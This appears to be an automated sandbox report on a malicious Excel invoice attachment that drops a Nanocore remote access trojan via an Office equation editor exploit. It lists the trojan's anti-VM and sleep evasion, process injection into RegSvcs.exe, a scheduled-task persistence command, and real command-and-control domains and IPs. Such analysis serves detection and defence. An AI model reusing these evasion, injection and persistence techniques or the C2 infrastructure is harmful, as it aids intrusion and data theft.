Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: SOL2021-03-14-NETC-NI-21-049-CEVA INV.xlsx Stream path 'EncryptedPackage' entropy: 7.9998366813 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY
Source: Yara match File source: 4.2.vbc.exe.26b2ea0.3.raw.unpack, type: UNPACKEDPE
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Window / User API: threadDelayed 546
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2388 Thread sleep time: -300000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2388 Thread sleep time: -60000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2488 Thread sleep time: -104850s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2656 Thread sleep time: -60000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2272 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 1100 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_004F0D66 GetSystemInfo, 7_2_004F0D66
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 104850
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Thread delayed: delay time: 922337203685477
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: vbc.exe, 00000004.00000002.2193832055.000000000056C000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2197072541.00000000026A1000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation

Anti Debugging:

Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Users\Public\vbc.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A
Writes to foreign memory regions
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 420000
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 422000
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 7EFDE008
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gmSlQSien' /XML 'C:\Users\user\AppData\Local\Temp\tmp2720.tmp'
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Source: RegSvcs.exe, 00000007.00000002.2394933863.0000000002814000.00000004.00000001.sdmp Binary or memory string: Program ManagerH
Source: RegSvcs.exe, 00000007.00000002.2394140607.0000000000D30000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: RegSvcs.exe, 00000007.00000002.2394140607.0000000000D30000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: RegSvcs.exe, 00000007.00000002.2394977223.000000000285A000.00000004.00000001.sdmp Binary or memory string: Program Managera
Source: RegSvcs.exe, 00000007.00000002.2394140607.0000000000D30000.00000002.00000001.sdmp Binary or memory string: !Progman
Source: RegSvcs.exe, 00000007.00000002.2393868574.00000000006A8000.00000004.00000020.sdmp Binary or memory string: FoProgram Manager8
Source: RegSvcs.exe, 00000007.00000002.2393868574.00000000006A8000.00000004.00000020.sdmp Binary or memory string: Program Manager- SOL2021-03-14-NETC-NI-21-049-CEVA INV - SOL2021-03-14-NETC-NI-21-049-CEVA INV:2
Source: RegSvcs.exe, 00000007.00000002.2394933863.0000000002814000.00000004.00000001.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe Queries volume information: C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Nanocore RAT
Source: Yara match File source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY
Source: Yara match File source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat
Source: vbc.exe, 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000007.00000002.2393755361.00000000005C0000.00000004.00000001.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Yara detected Nanocore RAT
Source: Yara match File source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY
Source: Yara match File source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_004F256E bind, 7_2_004F256E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_004F253B bind, 7_2_004F253B
Behavior Graph (ID: 385193, Sample: SOL2021-03-14-NETC-NI-21-04..., Start date: 12/04/2021, Architecture: WINDOWS, Score: 100)

Signatures on the sample: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 17 other signatures

Process tree recovered from the graph:

  • EXCEL.EXE (started)
    Dropped: ~$SOL2021-03-14-NE...1-049-CEVA INV.xlsx (data)
  • EQNEDT32.EXE (started)
    Network: covid19vaccinations.hopto.org (13.235.115.155, ports 49167, 80; AMAZON-02US, United States)
    Dropped: C:\Users\user\AppData\Local\...\nano[1].exe (PE32); C:\Users\Public\vbc.exe (PE32)
    Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    • vbc.exe (started by EQNEDT32.EXE)
      Dropped: C:\Users\user\AppData\Roaming\gmSlQSien.exe (PE32); C:\Users\user\AppData\Local\...\tmp2720.tmp (XML)
      Signatures: Machine Learning detection for dropped file; Uses schtasks.exe or at.exe to add and modify task schedules; Writes to foreign memory regions; 2 other signatures
      • schtasks.exe (started by vbc.exe)
      • RegSvcs.exe (started by vbc.exe)
        Network: 79.134.225.30, port 1144 (FINK-TELECOM-SERVICESCH, Switzerland); nassiru1155.ddns.net
        Dropped: C:\Users\user\AppData\Roaming\...\run.dat (ISO-8859); C:\Program Files (x86)\...\smtpsvc.exe (PE32)
        Signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
  • smtpsvc.exe (started)

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
13.235.115.155 | covid19vaccinations.hopto.org | United States | 16509 | AMAZON-02US | true
79.134.225.30 | unknown | Switzerland | 6775 | FINK-TELECOM-SERVICESCH | true

Contacted Domains

Name | IP | Active
covid19vaccinations.hopto.org | 13.235.115.155 | true
nassiru1155.ddns.net | unknown | unknown

Contacted URLs

